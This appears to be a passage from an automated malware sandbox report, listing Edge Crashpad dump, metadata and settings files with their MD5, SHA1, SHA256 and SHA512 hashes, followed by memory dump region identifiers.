| SHA512 | 5a6f1982b5eb95d28ebdff1570969eb2476322defc5978679693592fb9047678f4b081b83b208666f45126c839a342506aa306fb81acd12016b0c9475ebbff68 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\fcaf00fe-f577-43fd-81a0-1bd29d290296.dmp
| MD5 | c9ed7e9c49e675b171fc1315fc022484 |
| SHA1 | 4d9ca86c7a7794513d040a1f5c177f702ed1f148 |
| SHA256 | e6df538e03ad9b0fd647434889f1508b844f479a68e288402b2871be7d933bf8 |
| SHA512 | 10e28fde43453cbc923721601e56928e78c3390bfb59f6a26f161c79fd2d5570c3a3d2c28cd5e9e5a490382f3d3466a59f67004b53570effb0e81b4c2a9d0960 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\8bd30271-72d7-482b-87e5-9f5d415996d2.dmp
| MD5 | e1b505102a50d27a6742bbf5d5cb08f8 |
| SHA1 | 3d884b1ccbae8a30a60f24676380ba43d78ff035 |
| SHA256 | 37e1f5300c33a3fe314622e66fa561c021fe26e24d8ab055468b0f27413124c2 |
| SHA512 | d6eb7556356ea73c5d33d3ee38e1f8dfbe68c0153e4c8a032eda233d54b13c5cb5adf0f743d60c11d89d3d9ba8bb7eaffe95f1ec7ef3345812a2269f876828cd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | 30d66600cbfa55df84741cdbd74a0735 |
| SHA1 | 7fc6f8280f376231745042023d24fa092de294b5 |
| SHA256 | 8b8c6eedf92df6f758d11df89c4729c265afa24d75ddae844a1e6cb8066114cf |
| SHA512 | 4f96324808b576ea5de9ca5971de5f6e11c22e4b62fa6ed68668fbeac8a3f27d6187adfc8bed1e63d3ad8fc0bf9bc691018e4a4e95cd13d1c73f07eddad2d39f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\609fd34d-2446-458d-8410-fd29da304fc7.dmp
| MD5 | 653991917726c4de59b87cf9709312c2 |
| SHA1 | 4b177da701a250463452bcd798ca95b25f7869d7 |
| SHA256 | f4acab86fe041bec239b0c83683f9b603549bd521d7ee57567143c9ea41d9f65 |
| SHA512 | 84532a270418f2f324cfb876a36f542cd740c418999d6203acb2db571be5aa4e82eb7fe32fe30f8feb1785970584eed80f873de071ef54edc744c8fd9acca395 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | df194a1223745d5d84ac7a6960a19067 |
| SHA1 | 19e8baa51d594b041f7178722420f49ed8f64ef4 |
| SHA256 | cd406d45d8d1208350b47abc25b065172d80f89e5518a77e28102f451dbb5944 |
| SHA512 | 936c84f6affdd66da220c5773d8ab2e8cc6c7d06e4881568784351c5fa4d4c97cb3b0ed90fade45d0cc7dc44f33f24e643e12b8a841880d779f6dae8b85a440b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\ed947f9c-5427-4219-b738-d5bb49f6fa2c.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | f0a9d790f792aa35198771f6ffe5e556 |
| SHA1 | 4a088c4d77cb13371fcdadef016eb2a1583ba616 |
| SHA256 | bdc7d0db5cc98b6e9390280daa4013cfc33b2aae8c56a067c1880d1d01324cef |
| SHA512 | da9c867dd716e963c121824e8d1e8f7ba936ab616d46fb12e650aec4c687b9945797e468b12787b8e74f438a89258c490cdc90fafb21668d7e45856c177e911c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\89ad4e69-7639-498e-8873-bb36789ace18.dmp
| MD5 | e295726c174e230417abf2408d7002cb |
| SHA1 | 8dd0520a1fe3ee87cf6256b0ddcbe8d817d022ef |
| SHA256 | bc95251d9237ee57c8efe4b6526447a59c66e103bac2f530ffec3d875ae4b970 |
| SHA512 | 3bfa95aaf335059baffcd7f65872e49907f5ab12198acd154dbe080f370041fb6a0570aac6e112b66e52734ac506a987f0d7f0e0060b165a70c67d441ecd176a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | c4918acaa30d837846941e217208a81c |
| SHA1 | 48d7f1099153e8eb36522f53d7c3042f153f82c8 |
| SHA256 | 512c7aab4c11214823fda4835f8346aa1aef9204d385990398295bf39905e797 |
| SHA512 | 4c509110cc5e44c2edeeaf1d582da74fa4793d1210075cb5230c889fbb9fb31f6960a27321cf63578380a448607cb7a7d8a7df264e6137adcad6515fa8982c35 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\003464b0-e142-422d-a6c4-ebff6e932fd9.dmp
| MD5 | 22b8b50dcd82e6b5d9f98d9243783c31 |
| SHA1 | 8dd6ae2c64afed0a1effb384703bcb9956e6d8e4 |
| SHA256 | 7ac1dab144af5a5dc372044dd46820ac0d5564571e9e91733b46c323772db6b2 |
| SHA512 | 23096356faf9153f6358f894627a0d92b5842fc33dd0f98b52a8bcafd19e183ccfe521f9ca417824e70c13dd4a67e3e517e87a8a95de02b6aebc8eac7d7ba4e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\380fc30e-40e8-4f31-829b-902113d51c4b.dmp
| MD5 | 21640e568e91fb3a2dabdaee43139c9d |
| SHA1 | 1684de28d18e176ed0ce51df2b558e0eee943fdc |
| SHA256 | 1f127a0889f8fd2049ef1cdbee116caf3513cd3e88bbd033a812a9220a642c90 |
| SHA512 | d781a2704b8452752d099cf58de86f13eb8894b8843c05a2f0b9d68c05892f9326313753e9a2359a28a502753a36501b079431f683604c7c282f34826e2f28ce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | b8b5a82bb11c7e37586ae32b3a0a7a05 |
| SHA1 | 4370efc5dd039435731ce7e28b35bf2581193cfe |
| SHA256 | 3b0ed1ce8f401b225c98fd07975e3d3ee12ec89318c15c0bb76b0a5ed536e402 |
| SHA512 | 8bdc65cd04a98f356c844136b04c3c6ef76ae606fd46a9363ab4fa5a6a3eabe94d630a20d0e07f9f7540acb0428379197c01e50a05a4fdde3e124f7a23a6eca0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\1aec9ba8-e99d-401d-9856-7a7139bc0c78.dmp
| MD5 | 3fcb90e538e49ef43d15cf36cb991631 |
| SHA1 | 579b81984eeb195b803d1492576c66f5722a92a0 |
| SHA256 | c32fca3e8f784f33a27bd166c85960dfe64b1fc8420a6a37cc95414c54231864 |
| SHA512 | 66c41adf34d3c14a929ced409d2f85526d3195a0989cde8eeb6cb2004ce1962236b3658b23c2ec1d585086b73720670a47908046683b32b17b1e3b95a2bfef51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\c4ac5f02-301c-43e3-b8aa-358f9927c2ae.dmp
| MD5 | 1225130661ad94c066bb26d3738c9f7b |
| SHA1 | eb26e16ae31de1807cbfa1873e4414e99e8ddafc |
| SHA256 | 2940d8ad8355d59684a8ae7cb21b6714370bdd386b437e847a82ce24f7de9bc7 |
| SHA512 | 9f572e343e1e3ad8555f94e9af21b8c08093497f5ce336da3a4f11c287121c53d9aaec83f51f93c55cdbb05a967345450fedfb02f212f03a6847dfd9f1023400 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | e6259bec9ddac890d93d0dcdb3846aa1 |
| SHA1 | f21787df5203bb2f14064b21e14dbe02fad1ce11 |
| SHA256 | 2810cba5fe2af27bba305565e2dccbc1fe7e13359200bc1642dda205e88bbf71 |
| SHA512 | 8e463a9364146be67f2f901d8634c040734749992d928dfde42d8d28fad942d65bf20f814a38d3cfd1ed8ead230cb02d20061e8ebdcd20c141107e36868ee60c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | c0363db7ce36ec6ef99b3f10d4dfe9f0 |
| SHA1 | 6425ca80ea0ae40b57f483c171dde67e081c735d |
| SHA256 | ac342bcf7c0913eae659b9f6b2e4f43b842d1f095acb116b2c1c3190ffd85b64 |
| SHA512 | 819bc3ffb6bc43f3477d719bd164ef48fab27bef2b75b53ddd4b3f1fdeec0edbb4e5e10521bb9fcf51b6fdd0564201f61419246519cef0c15e22ba47c88fd5d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\292d474a-9377-497a-b1c1-10b25edddadc.dmp
| MD5 | a1fe49acdf18bf5cb1cc4df611c1fa71 |
| SHA1 | a721bb36ce5942522a38ef4a81f74e6a38f66f01 |
| SHA256 | 0749ad1121737c7947142a5ccb4f4a4f3481ecc961287f999799bcc46b1dc381 |
| SHA512 | 544064c9b0456b70250d6bcb44f75788eacd05199d9d38006f65d8e6eb693d478f5778b3127123c57143778b887f85377c981cde4a1381d050e6672101b6cf7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | b5199c84d54b14f14b4d8351e7ad58be |
| SHA1 | 88f9b003dc9f2990ef3d3ea99551745219fa6b1d |
| SHA256 | 67fb156f15b8a1fb8cf6be5d00f357aa471c09ff0d691b9f1495290197193891 |
| SHA512 | 618a27bbcd14343df0260e8b282144ae6cb7b39290011ab315c43ffe54f08c3c58243da233b7fcb4196dd6d36be7fd8a61f7c36ca07cfb0484939c575aa60a5a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f3afa200-2d28-4dd8-aa41-4893f6971d8a.dmp
| MD5 | 265a35fa87ac821d36bc102f458aafee |
| SHA1 | 007546a2f2ef9495709ccb20c1f1236e77a30cf4 |
| SHA256 | f83824f535a04a726989ab65efcdedfe5e38e390e5aabf3c9c18944d63228b21 |
| SHA512 | c44bd04f913d135670f18154c3f62ad1a88cd29ff15d6b5aef2ada17f2e16a423a7050cfc51b14c72302d94e8814ab9831d8c645f8cf8c17631352cf9e08b4a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata
| MD5 | 6908d6ad9a79b5480ee1c18bb13826a1 |
| SHA1 | 9cead42c7042ccabbd28c803c82df98d5e45797d |
| SHA256 | a03adca87e4a8a1a69209d0780c5055996de1b6f1797cc6913c6926613a34beb |
| SHA512 | 4d23dd20676f9fa5c4db7af0edcdcedafb607492dbc12df65733ccf02166df08e00c42c922f15c2093d71405d2f7d773d2d95386c2d37b7f81651497e27d6e87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7706fb13-207f-4d70-b6fa-25e1450a5d12.dmp
| MD5 | 574f33f58a9e51459803127a22bb36f6 |
| SHA1 | b6ece21c6ca0b286e858d6229edae9dd0826b49d |
| SHA256 | abe711f4c64822997c4c00a4223086ceae2a0d628bcc43ede6c7d5602b728e85 |
| SHA512 | de3ee7b91e88c1e30b71dd4092b697a5ca1e1420168e3b9229a4679090ca3ede8dcbf323bb4c1684cb483c93752db907d2f981e644c4f2027688ced32fd8bfef |
memory/3828-1377-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1552-1380-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/1552-1381-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/392-1382-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/392-1383-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-1384-0x000000001B490000-0x000000001B49E000-memory.dmp